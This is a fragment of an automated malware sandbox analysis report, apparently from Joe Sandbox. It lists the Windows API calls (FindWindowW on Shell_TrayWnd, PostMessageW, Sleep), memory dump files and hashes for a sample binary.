                                                • Instruction Fuzzy Hash: A1D01271384354B7F2747770AC0BFDA7A58AB14B51F100955B749AB1D0CDE4E941C754
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B086E2
                                                • PostMessageW.USER32(00000000), ref: 00B086E9
                                                  • Part of subcall function 00AE7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7AD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 079ef519064ce6d13c31544a9be63a818652a540e914d7610b458d4c73432044
                                                • Instruction ID: d1e5fcf59f1066bac959eb4b61f70e78a4d421da0bf21d328dfc3948381bf152
                                                • Opcode Fuzzy Hash: 079ef519064ce6d13c31544a9be63a818652a540e914d7610b458d4c73432044
                                                • Instruction Fuzzy Hash: 36D022313803147BF2347330AC0BFCA3A48AB18B11F000854B705EB1D0CCE4E900C714